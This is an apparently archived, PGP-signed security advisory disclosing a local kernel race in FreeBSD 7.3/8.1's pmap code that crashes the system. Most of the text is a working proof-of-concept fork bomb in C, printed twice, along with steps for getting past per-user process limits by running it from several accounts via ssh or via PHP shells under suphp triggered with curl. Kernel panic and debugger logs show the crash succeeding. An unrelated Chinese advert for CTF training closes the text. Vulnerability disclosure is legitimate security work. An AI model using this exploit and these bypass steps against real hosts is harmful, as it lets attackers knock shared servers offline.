-----BEGIN PGP SIGNED MESSAGE-----  

Hash: SHA1  

   

[ FreeBSD 8.1/7.3 vm.pmap kernel local race condition  ]  

   

Author: Maksymilian Arciemowicz  

http://SecurityReason.com  

http://lu.cxib.net  

Date:  

- - Dis.: 09.07.2010  

- - Pub.: 07.09.2010  

   

Affected Software (verified):  

- - FreeBSD 7.3/8.1  

   

Original URL:  

http://securityreason.com/achievement_securityalert/88  

   

   

- --- 0.Description ---  

maxproc  

    This is the maximum number of processes a user may be running. This  

includes foreground and background processes alike. For obvious reasons,  

this may not be larger than the system limit specified by the  

kern.maxproc sysctl(8). Also note that setting this too small may hinder  

a user's productivity: it is often useful to be logged in multiple times  

or execute pipelines. Some tasks, such as compiling a large program,  

also spawn multiple processes (e.g., make(1), cc(1), and other  

intermediate preprocessors).  

vm.pmap.shpgperproc  

           

           

- --- 1. FreeBSD 8.1/7.3 kernel local race condition ---  

Race condition in pmap, allows attackers to denial of service freebsd  

kernel. Creating a lot of process by fork() (~ kern.maxproc), it's  

possible to denial kernel.  

To bypass the MAXPROC from login.conf, we can use a few users to run PoC  

in this same time, to reach kern.maxproc. suphp can be very usefully.  

   

We need choose vector attack. When we have access to few users via ssh,  

use openssh.  

   

Example attack by ssh  

POC:  

   

/*  

FreeBSD 7.3/8.1 pmap race condition PoC  

Credit: Maksymilian Arciemowicz  

*/  

#include <stdio.h>  

#include <sys/types.h>  

#include <unistd.h>  

   

void newproc(){  

again:  

fork();  

sleep(3600*24);  

goto again;  

}  

   

void runfork(){  

pid_t adr;  

if(0!=(adr=fork())) printf("fork not zero\n");  

else {  

printf("fork zero\n");  

newproc();  

}  

}  

   

int main(){  

   

int secdel=5;  

int dev;  

   

// clock with (int)secdel secound frequency  

while(1){  

printf("sleep %i sec\n",secdel);  

sleep(secdel);  

printf("weak up\n");  

   

// create 512 processes  

dev=512;  

while(dev--)  

runfork();  

}  

return 0;  

}  

   

   

127# ssh cx () 0  

Password:  

$ gcc -o poc81 poc81.c  

$ ./poc81  

   

and in the same time (symetric)  

   

127# ssh max () 0  

Password:  

$ gcc -o poc81 poc81.c  

$ ./poc81  

   

Result:  

Jul 29 08:41:29 127 kernel: maxproc limit exceeded by uid 1002, please  

see tuning(7) and login.conf(5).  

Jul 29 08:42:01 127 last message repeated 31 times  

Jul 29 08:44:02 127 last message repeated 119 times  

Jul 29 08:50:27 127 syslogd: kernel boot file is /boot/kernel/kernel  

Jul 29 08:50:27 127 kernel: maxproc limit exceeded by uid 0, please see  

tuning(7) and login.conf(5).  

Jul 29 08:50:27 127 kernel: panic: get_pv_entry: increase  

vm.pmap.shpgperproc  

Jul 29 08:50:27 127 kernel: cpuid = 0  

Jul 29 08:50:27 127 kernel: Uptime: 13m23s  

Jul 29 08:50:27 127 kernel: Cannot dump. Device not defined or unavailable.  

Jul 29 08:50:27 127 kernel: Automatic reboot in 15 seconds - press a key  

on the console to abort  

Jul 29 08:50:27 127 kernel: --> Press a key on the console to reboot,  

Jul 29 08:50:27 127 kernel: --> or switch off the system now.  

Jul 29 08:50:27 127 kernel: Rebooting...  

Jul 29 08:50:27 127 kernel: Copyright (c) 1992-2010 The FreeBSD Project.  

   

But when we have php-shell from several uid`s, we can also use suphp.  

   

Example attack by suphp:  

127# cat cxuser.php  

<?php  

        system("./def");  

?>  

127# ls -la  

total 16  

drwxr-xr-x  2 root  wheel   512 Jul 29 08:43 .  

drwxr-xr-x  4 root  wheel   512 Jul 29 08:38 ..  

- -rw-r--r--  1 cx    cx       27 Jul 29 08:38 cxuser.php  

- -rwxr-xr-x  1 cx    cx     7220 Jul 29 08:38 def  

- -rw-r--r--  1 max   max      27 Jul 29 08:43 maxuser.php  

   

now remote request to cxuser.php and maxuser.php  

   

curl http://victim/hack/cxuser.php  

and in the same time  

curl http://victim/hack/maxuser.php  

   

result:  

Jul 29 08:43:07 localhost login: ROOT LOGIN (root) ON ttyv0  

Jul 29 08:48:30 localhost syslogd: kernel boot file is /boot/kernel/kernel  

Jul 29 08:48:30 localhost kernel: maxproc limit exceeded by uid 1001,  

please see tuning(7) and login.conf(5).  

Jul 29 08:48:30 localhost kernel: panic: get_pv_entry: increase  

vm.pmap.shpgperproc  

Jul 29 08:48:30 localhost kernel: cpuid = 0  

Jul 29 08:48:30 localhost kernel: Uptime: 4m43s  

Jul 29 08:48:30 localhost kernel:  

Jul 29 08:48:30 localhost kernel: Dump failed. Partition too small.  

Jul 29 08:48:30 localhost kernel: Automatic reboot in 15 seconds - press  

a key on the console to abort  

Jul 29 08:48:30 localhost kernel: Rebooting...  

Jul 29 08:48:30 localhost kernel: Copyright (c) 1992-2010 The FreeBSD  

Project.  

   

   

- ---debug log - cron (uid=0)---  

...  

maxproc limit exceeded by uid 1002, please see tuning(7) and login.conf(5).  

maxproc limit exceeded by uid 1001, please see tuning(7) and login.conf(5).  

maxproc limit exceeded by uid 1001, please see tuning(7) and login.conf(5).  

maxproc limit exceeded by uid 1002, please see tuning(7) and login.conf(5).  

panic: get_pv_entry: increase vm.pmap.shpgperproc  

cpuid = 0  

KDB: enter: panic  

[ thread pid 7417 tid 106207 ]  

Stopped at kdb_enter+0x3a: movl $0,kdb_why  

...  

KDB: enter: panic  

[ thread pid 7417 tid 106207 ]  

Stopped at kdb_enter+0x3a: movl $0,kdb_why  

db> ps  

pid ppid pgrp uid state wmesg wchan cmd  

7417 880 880 0 RL CPU 0 cron  

7416 880 880 0 RL cron  

7415 7413 880 0 RVL cron  

7414 7412 7412 0 R sh  

7413 880 880 0 D ppwait 0xc8118548 cron  

7412 7411 7412 0 Ss wait 0xc8118aa0 sh  

7411 880 880 0 S piperd 0xc4d7eab8 cron  

7410 5367 1294 1001 RL+ def  

7409 5366 1294 1001 RL+ def  

7408 5365 1294 1001 RL+ def  

7407 5364 1294 1001 RL+ def  

7406 5363 1294 1001 RL+ def  

7405 5362 1294 1001 RL+ def  

7404 5361 1294 1001 RL+ def  

...  

db> trace  

Tracing pid 7417 tid 106207 td 0xc8113280  

kdb_enter(c0ccfb5c,c0ccfb5c,c0d0a037,e7f9da38,0,...) at kdb_enter+0x3a  

panic(c0d0a037,10,c0d09b5f,88c,0,...) at panic+0x136  

get_pv_entry(c80bcce0,0,c0d09b5f,ccd,c0fabd00,...) at get_pv entry+0x252  

pmap_enter(c80bcce0,a0f7000,1,c2478138,5,...) at pmap_enter+0x34c  

vm_fault(c8Obcc30,a0f7000,1,0,a0f711b,...) at vm_fault+0x1b02  

trap_pfault(5,0,c0dOblle,c0cd1707,c8118550,...) at trap_pfault+0xl0d  

trap(e7f9dd28) at trap+0x2d0  

calltrap() at calltrap+0x6  

- --- trap 0xc, eip = 0xa0f711b, esp = 0xbfbfec8c, ebp = 0xbfbfecc8 --  

db> show pcpu  

cpuid = 0  

dynamic pcpu = 0x627d00  

curthread = 0xc8113280: pid 7417 "cron"  

curpcb = 0xe7f9dd80  

fpcurthread = none  

idlethread = 0xc4183a00: tid 100003 "idle: cpu0"  

APIC ID = 0  

currentldt = 0x50  

spin locks held:  

...  

db> show registers  

cs 0x20  

ds 0xc0cc0028  

es 0xc0d00028  

fs 0xc08f0008 free_unr+0x188  

ss 0x28  

eax 0xc0ccfb5c  

ecx 0xc148792f  

edx 0  

ebx 0xl  

esp 0xe7f9d9f8  

ebp 0xe7f9da00  

esi 0x100  

edi 0xc8113280  

eip 0xc08de44a kdb_enter+0x3a  

efl 0x286  

kdb_enter+0x3a: movl $0,kdb_why  

...  

db> show page  

cnt.v_free_count: 104827  

cnt.v_cache_count: 11  

cnt.v_inactive_count: 3369  

cnt.v_active_count: 44397  

cnt.v_wire_count: 58250  

cnt.v_free_reserved: 324  

cnt.v_free_min: 1377  

cnt.v_free_target: 5832  

cnt.v_cache_min: 5832  

cnt.v_inactive_target: 8748  

...  

- ---debug log - crash in cron (uid=0)---  

   

- ---debug log - crash in def (uid=1001)---  

db> ps  

...  

6774 4777 2009 1001 RL+ def  

6773 4777 2009 1001 RL+ CPU 0 def  

6772 4777 2009 1001 RL+ def  

...  

db> show pcpu  

cpuid = 0  

dynamic pcpu = 0x627d00  

curthread = Oxc8c34c80: pid 6773 "def"  

curpcb = Oxe97f6d80  

fpcurthread = none  

idlethread = 0xc4183a00: tid 100003 "idle: cpu0"  

APIC ID = 0  

currentldt = 0x50  

spin locks held:  

...  

- ---debug log - crash in def (uid=1001)---  

   

- --- 2. PoC def2.c ---  

/*  

FreeBSD 7.3/8.1 pmap race condition PoC  

Credit: Maksymilian Arciemowicz  

*/  

#include <stdio.h>  

#include <sys/types.h>  

#include <unistd.h>  

   

void newproc(){  

again:  

fork();  

sleep(3600*24);  

goto again;  

}  

   

void runfork(){  

pid_t adr;  

if(0!=(adr=fork())) printf("fork not zero\n");  

else {  

printf("fork zero\n");  

newproc();  

}  

}  

   

int main(){  

   

int secdel=5;  

int dev;  

   

// clock with (int)secdel secound frequency  

while(1){  

printf("sleep %i sec\n",secdel);  

sleep(secdel);  

printf("weak up\n");  

   

// create 512 processes  

dev=512;  

while(dev--)  

runfork();  

}  

return 0;  

}  

   

   

- --- 3. Greets ---  

sp3x, Infospec, Adam Zabrocki 'pi3'  

   

   

- --- 4. Contact ---  

Author: SecurityReason.com [ Maksymilian Arciemowicz ]  

   

Email:  

- - cxib {a\./t] securityreason [d=t} com  

   

GPG:  

- - http://securityreason.com/key/Arciemowicz.Maksymilian.gpg  

   

http://securityreason.com/  

http://lu.cxib.net/  

   

- --   

Best Regards,  

- ------------------------  

pub   1024D/A6986BD6 2008-08-22  

uid                  Maksymilian Arciemowicz (cxib)  

<cxib () securityreason com>  

sub   4096g/0889FA9A 2008-08-22  

   

http://securityreason.com  

http://securityreason.com/key/Arciemowicz.Maksymilian.gpg  

-----BEGIN PGP SIGNATURE-----  

   

iEYEARECAAYFAkyGff0ACgkQpiCeOKaYa9b0QQCfbY7yNcbUa7TDOTYxzgN7ya0y  

yQMAn079PHiu7Uy5WU3gvsJnvzZ0M8qO  

=D5mh  

-----END PGP SIGNATURE-----

[CTF入门培训]顶尖高校博士及硕士团队亲授《30小时教你玩转CTF》，视频+靶场+题目！助力进入CTF世界